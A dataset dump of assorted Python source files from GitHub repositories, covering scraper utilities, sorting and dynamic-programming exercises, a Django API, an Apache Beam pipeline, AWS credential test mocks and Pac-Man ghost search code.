exit(main())\n","repo_name":"nealcox/aoc2020","sub_path":"day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3372639708","text":"import errno\nimport json\nimport jsonpickle\nimport logging\nimport os\nimport shutil\nimport subprocess\nfrom operator import itemgetter\n\nimport natsort\nimport math\nimport time\nimport datetime\n\nclass DatetimeEncoder(json.JSONEncoder):\n def default(self, obj):\n try:\n return super(DatetimeEncoder, obj).default(obj)\n except TypeError:\n return str(obj)\n\n# FUNCTIONS\n\ndef assertType(var_name, var_val, var_type):\n if not isinstance (var_val, var_type):\n raise Exception (\"Unrecognized type of {}={} ({}). Expected type: {}\"\n .format (var_name, var_val, type (var_val), var_type))\n\n__glo_log_file = None\n\ndef getCurrentLogFile():\n return __glo_log_file\n\ndef loggerSetup(log_file, remove_old_log=True, print_start_date = True):\n global __glo_log_file\n\n #Reset logging handlers\n logging.getLogger().handlers = []\n\n #log_format_str = \"[%(asctime)s:%(levelname)s:%(filename)s:%(lineno)d:%(funcName)s] %(message)s\"\n #log_format_str = \"[%(levelname)-5s:%(filename)-20s:%(lineno)-3s:%(funcName)-20s] %(message)s\"\n log_format_str = \"[%(filename)-20s:%(lineno)-3s:%(funcName)-20s] %(message)s\"\n fmt = logging.Formatter(log_format_str, datefmt='%H:%M:%S')\n\n # console log handler\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(fmt)\n logging.getLogger().addHandler(console_handler)\n\n # file log handler\n if log_file is not None:\n if remove_old_log:\n silentRemove(log_file)\n file_handler = logging.FileHandler(log_file, mode='a', encoding=\"utf8\")\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(fmt)\n logging.getLogger().addHandler(file_handler)\n __glo_log_file = log_file\n\n # root logger\n logging.getLogger().setLevel(logging.DEBUG)\n if print_start_date:\n logging.info(\"Starting at: \" + time.strftime(\"%Y-%m-%d\"))\n\ndef setup(log_file, output_file):\n loggerSetup(log_file)\n if output_file:\n silentRemove(output_file)\n # Initialize JSON pickle\n iniJSONPickle()\n\ndef isValid(indata):\n # !!! REMEMBER THAT bool(math.nan) RETURNS TRUE. NAN IS TRUE !!!\n a = not isNan(indata)\n b = (indata is not None)\n return (a and b)\n\ndef isNan(num):\n return isinstance(num, float) and math.isnan(num)\n\ndef str2date(instr):\n \"\"\"\n Converts a string in the form of \"YEAR-MONTH-DAY\" (e.g. 2010-09-08) or \"current\" to a datetime.datetime object\n Correctly handles NaN and None\n :param instr: The date to convert from in string format\n :return: the datetime.date object or None if the conversion fails\n \"\"\"\n # already a date\n if isinstance(instr, datetime.date):\n return instr\n\n # detects None\n if instr is None:\n return None\n\n #detect NaN\n if isinstance(instr, float) and math.isnan(instr):\n return None\n\n #current\n if instr == \"current\":\n return datetime.datetime.now().date()\n\n #assume year-month-day\n try:\n res = datetime.datetime.strptime(instr, \"%Y-%m-%d\").date()\n except TypeError:\n logging.critical(\"TypeError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n except ValueError:\n logging.critical(\"ValueError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n return res\n\ndef str2dateVicoFormat(instr):\n \"\"\"\n Converts a string in the form of \"YEAR-MONTH-DAY\" (e.g. 
2010-09-08) or \"current\" to a datetime.datetime object\n Correctly handles NaN and None\n :param instr: The date to convert from in string format\n :return: the datetime.date object or None if the conversion fails\n \"\"\"\n\n #detect NaN\n if isinstance(instr, float) and math.isnan(instr):\n return None\n\n #assume year-month-day\n dash_arr = instr.split('-')\n if len(dash_arr[0]) == 4:\n dformat = \"%Y-%m-%d\"\n elif len(dash_arr[2]) == 4:\n dformat = \"%d-%m-%Y\"\n else:\n raise Exception(\"Format not understood for: {}\".format(instr))\n \n try:\n res = datetime.datetime.strptime(instr, dformat).date()\n except TypeError:\n logging.critical(\"TypeError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n except ValueError:\n logging.critical(\"ValueError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n return res\n\ndef remDir(dir):\n # Remove folder\n if os.path.isdir(dir):\n shutil.rmtree(dir)\n # Independently of wheter it already existed or not\n os.makedirs(dir, exist_ok=True)\n\n\ndef sortDFColumns(frame, first_cols=[]):\n \"\"\"\n Sort the columns of a dataframe\n :param frame: The pandas.DataFrame\n :param first_cols: A list of columns to put first\n :return: The sorted DataFrame\n \"\"\"\n\n # Build a dict col->cardinal number\n col_map = dict()\n for i, c in enumerate(first_cols):\n if c not in frame:\n raise Exception(\"{} is not in the DataFrame ({})\".format(c, list(frame)))\n col_map[c] = str(i+1)\n\n # Rename columns\n frame.rename(columns=col_map, inplace=True)\n\n # Sort columns\n frame = frame.reindex_axis(natsort.natsorted(frame.columns, alg=natsort.ns.IGNORECASE), axis=1)\n\n # Rename columns back\n inv_map = {v:k for k,v in col_map.items()}\n frame.rename(columns=inv_map, inplace=True)\n\n return frame\n\n\ndef column(matrix, i):\n f = itemgetter(i)\n return map(f, matrix)\n\n\ndef silentRemove(filename):\n try:\n os.remove(filename)\n except OSError as e: # this would be \"except OSError, e:\" before Python 2.6\n if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory\n raise # re-raise exception if a different error occurred\n\n\n# Print iterations progress\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\ndef csv2stata(infile):\n stata_exe = \"C:\\Program Files (x86)\\Stata13\\StataMP-64.exe\"\n\n if not os.path.isfile(stata_exe):\n raise Exception(\"STATA not found: {}\".format(stata_exe))\n\n if not os.path.isfile(infile):\n raise Exception(\"Input file not found: {}\".format(infile))\n\n infile = os.path.abspath(infile)\n root_dir, in_base = os.path.split(infile)\n in_name = os.path.splitext(in_base)[0]\n do_file = os.path.join(root_dir, in_name + \".do\")\n dta_file = os.path.join (root_dir, in_name + \".dta\")\n log_file = 
os.path.join (root_dir, in_name + \".log\")\n silentRemove(do_file)\n silentRemove(dta_file)\n silentRemove (log_file)\n\n do_cont = 'clear all \\n'\n do_cont += 'import delimited using \"' + in_base + '\", delimiters(\",\") bindquotes(strict) \\n'\n do_cont += 'save \"' + in_name + '\", replace \\n' # very import the last new line\n\n with open(do_file, 'w') as file:\n file.write(do_cont)\n\n command_line = \"\\\"\" + stata_exe + \"\\\" /e do \" + do_file\n logging.info(command_line)\n #os.system(command_line)\n res = subprocess.call([stata_exe, \"/e\", \"do\", do_file])\n logging.info(\"Result={}\".format(res))\n\n\ndef iniJSONPickle():\n jsonpickle.set_preferred_backend('simplejson')\n jsonpickle.set_encoder_options('simplejson', indent=4, sort_keys=True, ensure_ascii=False)\n\n\ndef readJSONFile(file, fatal_on_not_found=True, default_return=None, fatal_on_decode_error=True):\n try:\n fileh = open(file, 'r', encoding=\"utf-8\")\n except FileNotFoundError:\n if fatal_on_not_found:\n msg = \"File not found '\" + file + \"'\"\n #logging.critical(msg)\n raise Exception(msg)\n else:\n return default_return\n else:\n # logging.debug(cont)\n cont = fileh.read()\n fileh.close()\n try:\n obj = jsonpickle.decode(cont)\n except json.decoder.JSONDecodeError:\n if fatal_on_decode_error:\n logging.critical(\"Decode error in '\" + file + \"'\")\n raise\n else:\n return default_return\n else:\n return obj\n\n\n# filename DOES INCLUDE EXTENSION\ndef saveJSON(data, filename, overwrite=True):\n if not overwrite and os.path.isfile(filename):\n return False\n data_str = jsonpickle.encode(data)\n\n dir = os.path.dirname(filename)\n os.makedirs(dir, exist_ok=True)\n\n with open(filename, 'w', encoding=\"utf-8\") as fileh:\n fileh.write(data_str)\n return True\n\n\ndef myTextStrip(str):\n return str.replace('\\n', '').strip()\n\n\ndef jsonPretty(dict_data):\n return json.dumps(dict_data, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False, cls=DatetimeEncoder)\n","repo_name":"saybinem/crunchbase_webscraper","sub_path":"src/cbscraper/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"44100221626","text":"import os\nfrom setuptools import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='adp',\n version='1.0',\n author='David Gadling',\n author_email='dave@toasterwaffles.com',\n description='A basic tool to download your pay stubs from adp.com',\n license='MIT',\n url='https://github.com/dgadling/adp-scrape',\n long_description=read('README.md'),\n py_modules=['adp'],\n install_requires=[\n 'Click',\n 'requests',\n ],\n entry_points='''\n [console_scripts]\n adp=adp:cli\n '''\n)\n","repo_name":"dgadling/adp-scrape","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7158785183","text":"# 퀵 정렬\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end) :\n if start >= end : # 원소가 1개인 경우\n return\n pivot = start\n left = start + 1\n right = end\n \n while(left <= right) :\n while(left <= end and array[left] <= array[pivot]) : # 좌측에서 피벗 값보다 큰 데이터를 찾는 idx 선형탐색\n left += 1\n \n while(right > start and array[right] >= array[pivot]) : #우측에서 피벗 값보다 작은 데이터를 찾는 idx 선형탐색\n right -=1\n \n if(left >right): # 서로 엇갈렸다면 작은 데이터와 피벗을 교체\n array[right] , array[pivot] = 
array[pivot], array[right]\n else : # otherwise, swap the smaller and the larger values\n array[right], array[left] = array[left], array[right]\n \n quick_sort(array, start, right -1)\n quick_sort(array, right+1, end)\n \nquick_sort(array, 0, len(array) - 1)\nprint(array) \n ","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73926341265","text":"\r\n\r\n# loading the JSON Data into a Python Dictionary\r\n\r\nimport json\r\nfrom difflib import SequenceMatcher, get_close_matches\r\n\r\ndata = json.load(open(\"data.json\"))\r\n\r\n# Returning the definition for a word\r\ndef translate(w):\r\n w = w.lower()\r\n # accounting for non-existing words\r\n if w in data:\r\n return data[w]\r\n elif len(get_close_matches(w, data.keys()))>0:\r\n # calculating similarity ratio between two words & making the program suggest a similar word\r\n yn = input(\"Did you mean %s instead? Enter Y if yes, or N if no: \" % get_close_matches(w, data.keys())[0])\r\n if yn == \"Y\":\r\n return data[get_close_matches(w, data.keys())[0]]\r\n elif yn == \"N\":\r\n return \"Word does not exist, please double-check it. \"\r\n else:\r\n return \"Entry not understood\"\r\n else:\r\n return \"The word does not exist. Please double-check it\"\r\n\r\nword = input(\"Enter word: \")\r\n\r\noutput = translate(word)\r\n\r\nif type(output) == list:\r\n for item in output:\r\n print(item)\r\nelse:\r\n print(output)\r\n\r\n\r\n\r\n","repo_name":"simonkenny-droid/python-beginings","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4241547437","text":"import sys\n\nr = sys.stdin.readline\n\nN = int(r())\n\nwines = [0]+[int(r()) for _ in range(N)]+[0]\ndp = [0] * (N+2)\ndp[1] = wines[1]\ndp[2] = dp[1] + wines[2]\n\nfor i in range(3, N+1):\n dp[i] = max(dp[i-3]+wines[i-1]+wines[i], dp[i-2]+wines[i], dp[i-1])\n\nprint(dp[N])","repo_name":"sanghee-ju/baekjoon","sub_path":"백준/Silver/2156. 
포도주 시식/포도주 시식.py","file_name":"포도주 시식.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9006016191","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\ndf = pd.read_csv(\"Survey-on-Regular-Life-Responses.csv\")\r\n\r\n\r\nplt.title('\\n\\nHaving trouble in all your relationships.\\n')\r\n\r\nprint(df.head())\r\nsns.set_style(\"dark\")\r\nsns.set_palette(\"RdBu\")\r\n#only change the value of X\r\n\r\nax = sns.countplot(x='You are having trouble in all your relationships (home as well as professional).', hue='Gender',data=df)\r\n\r\ntotal = int(1)\r\nfor p in ax.patches:\r\n height = p.get_height()\r\n ax.text(p.get_x()+p.get_width()/2.,\r\n height + 3,\r\n '{:1.2f}'.format(height/total),\r\n ha=\"center\",fontsize=10)\r\nax.set(xlabel=' ', ylabel='Number of people')\r\n\r\n\r\nax.set_ylabel(\"Number of people\")\r\n\r\nax.spines['top'].set_visible(False)\r\nax.spines['right'].set_visible(False)\r\n\r\nplt.legend(loc='upper right')\r\n#plt.xticks(rotation=20)\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"Akash-Ahmed-CSE/Projects","sub_path":"COVID 19 Depression Analysis using Data Visualization/count plot.py","file_name":"count plot.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437627350","text":"class Solution:\n def maxCoins(self, nums):\n nums, dp = [1] + nums + [1], [[0] * (len(nums) + 2) for _ in range(len(nums) + 2)]\n\n def helper(i, j):\n if dp[i][j] or j - i <= 1:\n return dp[i][j]\n dp[i][j] = max(nums[i] * nums[j] * nums[k] + helper(i, k) + helper(k, j) for k in range(i + 1, j))\n return dp[i][j]\n\n return helper(0, len(nums) - 1)\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.maxCoins([3, 1, 5, 8]))\n","repo_name":"MadSkittles/leetcode","sub_path":"312.py","file_name":"312.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30335413548","text":"import os\nimport argparse\nimport pandas as pd\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', '-path', help='path to experiment folder containing recordings folders', default='C:\\\\Users\\\\user\\\\Documents\\\\Papers\\\\Affect-based\\\\Experiments\\\\il_cur_6.0_02', type=str)\nparser.add_argument('--cov_t', '-cov_t', help='coverage threshold. 
to cope with too short segments', default=50, type=int)\nargs = parser.parse_args()\n\n# list of all recordings data_folders\ndata_folders = [name for name in os.listdir(args.path) if os.path.isdir(os.path.join(args.path, name))]\ndata_folders = [os.path.join(args.path, f) for f in data_folders]\n\ndurations, coverages = [], []\nduration_sub = 0.0\nfor folder in data_folders:\n # open evaluation file\n eval_txt = pd.read_csv(os.path.join(folder, 'airsim_rec.txt'), sep='\\t')\n\n # read file\n for i in range(0, eval_txt.shape[0], 1):\n\n if i > 0 and float(eval_txt.iloc[i-1][['StartingPoint']]) < float(eval_txt.iloc[i][['StartingPoint']]):\n duration_sub = float(eval_txt.iloc[i][['Duration']])\n\n if (i < eval_txt.shape[0] - 1 and float(eval_txt.iloc[i][['Coverage']]) > float(eval_txt.iloc[i+1][['Coverage']])) or (i == eval_txt.shape[0] - 1):\n # if the given coverage is higher than the threshold\n if float(eval_txt.iloc[i][['Coverage']]) > args.cov_t:\n coverages.append(float(eval_txt.iloc[i][['Coverage']]))\n durations.append(float(eval_txt.iloc[i][['Duration']])-duration_sub)\n\ndurations_mean = np.array(durations).mean()\ncoverages_mean = np.array(coverages).mean()#*10.7639 - constant to convert from m^2 to ft^2\nsessions = np.array(coverages).shape[0]\n\nprint(\"Durations mean: {}. Coverages mean: {}. Sessions: {}.\".format(durations_mean,coverages_mean,sessions))","repo_name":"microsoft/affectbased","sub_path":"evaluation/get_coverage_results.py","file_name":"get_coverage_results.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"44459925815","text":"import coreapi\nimport coreschema\nfrom rest_framework.schemas import AutoSchema\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.db.models import Max\nfrom core.models import Gov, Yearref, Govindicator\nfrom api import averages\n\nfrom . 
import serializers\n\n\nclass GovernmentsView(APIView):\n \"\"\"\n Return a list of all the governments\n \"\"\"\n def get(self, request, format=None):\n query = Gov.objects.all()\n serialize = serializers.GovernmentDetailSerializer(\n query,\n context={'request': request},\n many=True\n )\n return Response(\n {'results': serialize.data}\n )\n\n\nclass GovernmentDetailView(APIView):\n \"\"\"\n Return details about a particular government\n \"\"\"\n schema = AutoSchema(manual_fields=[\n coreapi.Field(\n 'govid',\n required=True,\n location='path',\n schema=coreschema.String(\n description='Unique identifier for a government'\n )\n ), coreapi.Field(\n 'year',\n required=False,\n location='query',\n schema=coreschema.String(\n description='year'\n )\n ),\n ])\n\n def get(self, request, govid):\n year = request.query_params.get(\n 'year',\n Yearref.objects.latest('yearid').yr\n )\n query = Gov.objects.get(govid=govid)\n serialize = serializers.GovernmentDetailSerializer(\n query,\n context={'request': request}\n )\n population = Govindicator\\\n .objects\\\n .only('iid__name', 'value', 'iid__short_name')\\\n .filter(\n govid=govid,\n iid__parentgid=1116,\n yearid__yr=year\n ).select_related('iid')\n\n household = Govindicator\\\n .objects\\\n .only('iid__name', 'value', 'iid__short_name')\\\n .filter(\n govid=govid,\n iid__parentgid=1119,\n yearid__yr=year\n ).select_related('iid')\n\n pop_density, total_population, area = averages.density(population)\n house_density, _, _ = averages.density(household)\n return Response(\n {'details': serialize.data,\n 'overview': {\n 'Households/km': house_density,\n 'People/km': pop_density,\n 'Population': total_population,\n 'Area': area,\n },\n 'year': year}\n )\n\n\nclass GovernmentIndicatorView(APIView):\n \"\"\"\n Return indicator scores for a particular government\n \"\"\"\n schema = AutoSchema(manual_fields=[\n coreapi.Field(\n 'govid',\n required=True,\n location='path',\n schema=coreschema.String(\n description='Unique identifier for a government'\n )\n ),\n coreapi.Field(\n 'subgroup',\n required=False,\n location='query',\n schema=coreschema.String(\n description='Indicators are placed in certain '\\\n 'groupings, the ids of these groups can be found in '\\\n '/api/v1/groupings'\n )\n ),\n coreapi.Field(\n 'indicator',\n required=False,\n location='query',\n schema=coreschema.String(\n description='List of unique indicator ids'\n )\n ),\n coreapi.Field(\n 'year',\n required=False,\n location='query',\n schema=coreschema.String(\n description='full year, e.g. 2015'\n )\n )\n ])\n\n def get(self, request, govid, format=None):\n subgroup = request.query_params.get('subgroup', None)\n indicators = request.query_params.get('indicator', None)\n year = request.query_params.get('year', None)\n if not year:\n year_latest = Govindicator\\\n .objects\\\n .aggregate(latest_year=Max('yearid'))\n year = Yearref.objects.get(yearid=year_latest['latest_year']).yr\n if indicators:\n indi = indicators.split(',')\n query = Govindicator.objects.filter(\n govid=govid,\n yearid__yr=year,\n iid__parentgid__in=indi\n ).select_related('iid', 'iid__parentgid')\n elif subgroup:\n query = Govindicator\\\n .objects\\\n .only('value', 'iid__name', 'iid__parentgid__name',\n 'iid__short_name')\\\n .filter(\n govid=govid,\n yearid__yr=year,\n iid__parentgid__parentgid=subgroup,\n )\\\n .select_related('iid', 'iid__parentgid')\n else:\n return Response(\n status=status.HTTP_400_BAD_REQUEST\n )\n\n serialize = serializers.IndicatorValueSerializer(\n query,\n context={'request': 
request},\n many=True\n )\n\n return Response(\n {\n 'results': serialize.data,\n 'year': year\n }\n )\n","repo_name":"OpenUpSA/salga-barometer-api","sub_path":"api/governments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"910579550","text":"# https://leetcode.com/problems/evaluate-reverse-polish-notation/description/\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n\n # space O(n) time O(n)\n\n stack = []\n\n for character in tokens:\n if character == \"+\":\n stack.append(stack.pop() + stack.pop())\n elif character == \"-\":\n val1, val2 = stack.pop(), stack.pop()\n stack.append(val2 - val1)\n elif character == \"*\":\n stack.append(stack.pop() * stack.pop())\n elif character == \"/\":\n val1, val2 = stack.pop(), stack.pop()\n # decimal division:\n # stack.append(val2/val1)\n # but we want to round it to zero like problem statement says so we use the int function to round it to zero \n stack.append(int(val2/val1)) \n else:\n stack.append(int(character))\n \n # return top of stack\n return stack[-1]\n","repo_name":"MadamHippo/Python-leetcode","sub_path":"150-evaluate-reverse-polish-notation.py","file_name":"150-evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"3749202190","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def subsum(self, arr: List[int], target: int) -> List[int]:\n pMap = collections.defaultdict(int)\n pMap[0] = -1 # empty prefix, so subarrays starting at index 0 are found too\n\n runningSum = 0\n for idx, num in enumerate(arr):\n runningSum += num\n pMap[runningSum] = idx\n\n # check if ans is in map\n delta = runningSum - target\n if delta in pMap:\n return [pMap[delta] + 1, idx] # the subarray starts one index after the prefix summing to delta\n\n\nif __name__ == '__main__':\n arr = [1, 3, 2, 5, 4]\n s = Solution()\n print(s.subsum(arr, 5))","repo_name":"jprice8/interview-prep","sub_path":"two-pointer/prefix-sum/subarraySum.py","file_name":"subarraySum.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"13195580900","text":"from protFeat.feature_extracter import extract_protein_feature\nimport argparse\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"arguments of feature extracter module\")\n parser.add_argument('--pf', type=str, default=\"aac_pssm\", help='protein feature in POSSUM or iFeature')\n parser.add_argument('--ppid', type=str, default=1, help='the place of protein id in fasta header')\n parser.add_argument('--inpf', type=str, default=\"input_folder\", help='path to fasta file directory')\n parser.add_argument('--fname', type=str, default=\"sample\", help='fasta file name')\n\n args = parser.parse_args()\n\n protein_feature = args.pf\n place_protein_id = int(args.ppid)\n input_folder = args.inpf\n fasta_file_name = args.fname\n\n\n extract_protein_feature(protein_feature, place_protein_id,\n input_folder, fasta_file_name)","repo_name":"gozsari/ProtFeat","sub_path":"src/protFeat_command_line.py","file_name":"protFeat_command_line.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"}
{"seq_id":"40050025810","text":"\"\"\"A template to import the default package and parse the arguments\"\"\"\n\n# pytype: skip-file\n\nfrom __future__ import absolute_import\n\nimport 
argparse\nimport logging\nimport re\n\nfrom past.builtins import unicode\n\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToText\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.options.pipeline_options import SetupOptions\n\nclass RegionSplit(beam.DoFn):\n def process(self, element):\n regionid, regionname = element.split(',')\n #return [(regionid, regionname)] # ParDo's need to return a list\n yield (regionid, regionname) # Can also use yield instead of returning a list\n\nclass MyPipelineOptions(PipelineOptions):\n @classmethod\n def _add_argparse_args(cls, parser):\n parser.add_argument(\n '--input',\n dest='input',\n help='Input for the pipeline',\n default='gs://dataflowclass1-bucket/regions.csv')\n parser.add_argument(\n '--output',\n dest='output',\n help='Output for the pipeline',\n default = 'gs://dataflowclass1-bucket/regions_output')\n #known_args, pipeline_args = parser.parse_known_args(argv)\n\n\ndef run(argv=None, save_main_session=True):\n \"\"\"Main entry point; defines and runs the pipeline.\"\"\"\n # We use the save_main_session option because one or more DoFn's in this\n # workflow rely on global context (e.g., a module imported at module level).\n pipeline_options = MyPipelineOptions()\n \n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n # The pipeline will be run on exiting the with block.\n with beam.Pipeline(options=pipeline_options) as p:\n # read the options from pipeline_options itself; known_args is never defined here\n lines = p | 'Read' >> ReadFromText(pipeline_options.input)\n records = lines | 'Split' >> beam.ParDo(RegionSplit())\n uppercase = records | 'Uppercase' >> beam.Map(lambda x : (int(x[0]), x[1].upper()))\n uppercase | 'Write' >> WriteToText(pipeline_options.output)\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n\n\n# using a ParDo and DoFn instead of a Map\nfilename = 'regions.csv'\nwith beam.Pipeline() as p:\n lines = p | 'Read' >> ReadFromText(filename)\n records = lines | 'Split' >> beam.ParDo(RegionSplit())\n records | 'Write' >> WriteToText('regions.out')\n\n\n\n# options = PipelineOptions()\n# google_cloud_options = options.view_as(GoogleCloudOptions)\n# google_cloud_options.project = 'my-project-id'\n# google_cloud_options.job_name = 'myjob'\n# google_cloud_options.staging_location = 'gs://your-bucket-name-here/staging'\n# google_cloud_options.temp_location = 'gs://your-bucket-name-here/temp'\n# options.view_as(StandardOptions).runner = 'DataflowRunner'\n\n","repo_name":"joegagliardo/dataflowclass1","sub_path":"simple3_custom.py","file_name":"simple3_custom.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"43277218808","text":"import os\nfrom unittest.mock import patch\nfrom config_loader import get_credentials\n\n\ndef mock_load_dotenv_prod():\n os.environ[\"PROD_AWS_ACCESS_KEY_ID\"] = \"test\"\n os.environ[\"PROD_AWS_SECRET_ACCESS_KEY\"] = \"test\"\n os.environ[\"PROD_AWS_REGION\"] = \"test\"\n\n\ndef mock_load_dotenv_dev():\n os.environ[\"DEV_AWS_ACCESS_KEY_ID\"] = \"test\"\n os.environ[\"DEV_AWS_SECRET_ACCESS_KEY\"] = \"test\"\n os.environ[\"DEV_AWS_REGION\"] = \"test\"\n\n\ndef test_get_credentials_production():\n \"\"\"Testing get_credentials in a production environment\"\"\"\n expected = {\n 'AWS_ACCESS_KEY_ID': 'test',\n 'AWS_SECRET_ACCESS_KEY': 'test',\n 'AWS_REGION': 'test'\n }\n with 
patch('config_loader.load_dotenv', side_effect=mock_load_dotenv_prod):\n\n result = get_credentials(env=\"production\")\n\n assert result == expected\n\n\ndef test_get_credentials_default():\n \"\"\"Testing get_credentials in a development or default environment\"\"\"\n expected = {\n 'AWS_ACCESS_KEY_ID': 'test',\n 'AWS_SECRET_ACCESS_KEY': 'test',\n 'AWS_REGION': 'test'\n }\n with patch('config_loader.load_dotenv', side_effect=mock_load_dotenv_dev):\n\n result = get_credentials()\n\n assert result == expected\n","repo_name":"Sbenaventebravo/AWSDynamo","sub_path":"test_config_loader.py","file_name":"test_config_loader.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"12252434764","text":"import random\r\nfrom data_structures import *\r\n\r\n\r\ndef total_distance(curr, target):\r\n '''Returns the total number of tiles between a current entity and a target entity by summing the horizontal and vertical steps between them in terms of tiles.\r\n :param curr and target: current entity and target entity as node objects (each entity has a node attribute, for example if clyde and pacman were called they both have a node which they occupy denoted self.node)\r\n It returns a distance in terms of tiles; each tile is a 16x16 block, so the total is integer-divided by 16.\r\n '''\r\n total_distance = abs(curr.pos.x - target.pos.x) + abs(curr.pos.y - target.pos.y)\r\n return (total_distance // 16)\r\n\r\ndef shuffle_array(array):\r\n random.shuffle(array)\r\n return array\r\n\r\n#GREEDY BFS IS REFERENCED INSIDE GHOST CLASS IN ENTITIES AS OPPOSED TO A STAND ALONE FUNCTION.\r\n\r\n\r\ndef dls(source, target, limit):\r\n '''\r\n Parameters: node objects source and target, source to begin the search and target to be found. Integer limit determining the\r\n depth of the search.\r\n Return Value: Boolean or array.\r\n Description: An implementation of depth-limited search. Searches through the graph representing the maze by adding adjacent nodes\r\n to a stack iteratively/recursively; these are then added to a visited array. Next nodes to search are popped from the top of the\r\n stack, if they are already in the visited array the algorithm backtracks through the stack to get an unvisited node. 
If the algorithm\r\n searches through the limit of nodes then it will return the visited array as a path.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n s = [source]\r\n visited = []\r\n\r\n while len(s) > 0:\r\n current = s.pop()\r\n if current in visited: # skip already-expanded nodes instead of popping from a possibly empty stack\r\n continue\r\n\r\n if current == target:\r\n return visited\r\n\r\n for node in shuffle_array([node for node in current.adjacent_nodes.values()]): # look at all of the adjacent nodes of that node and if they are valid push them to the back of the queue\r\n if node != None: #shuffle_array function randomly shuffles the order of nodes to be entered to the stack, which are all valid dfs searches but increases the search capacity of the ghost(in the sense that it will cover more of the graph as opposed to following the strict order of nodes in adjacent_nodes dict)\r\n s.append(node)\r\n\r\n visited.append(current)\r\n if len(visited) == limit:\r\n return visited\r\n\r\n return False\r\n\r\n\r\ndef bfs(source, target):\r\n q = [source]\r\n came_from = {}\r\n path = []\r\n visited = []\r\n\r\n while len(q) > 0:\r\n current = q.pop(0)\r\n if current in visited: # skip already-expanded nodes instead of popping from a possibly empty queue\r\n continue\r\n\r\n if current == target:\r\n path.append(current)\r\n while current in came_from:\r\n current = came_from[current]\r\n path.append(current)\r\n\r\n return path[::-1]\r\n\r\n for node in current.adjacent_nodes.values():\r\n if node != None and node not in visited and node not in came_from:\r\n q.append(node)\r\n came_from[node] = current # map each node to its predecessor so the path can be rebuilt\r\n\r\n 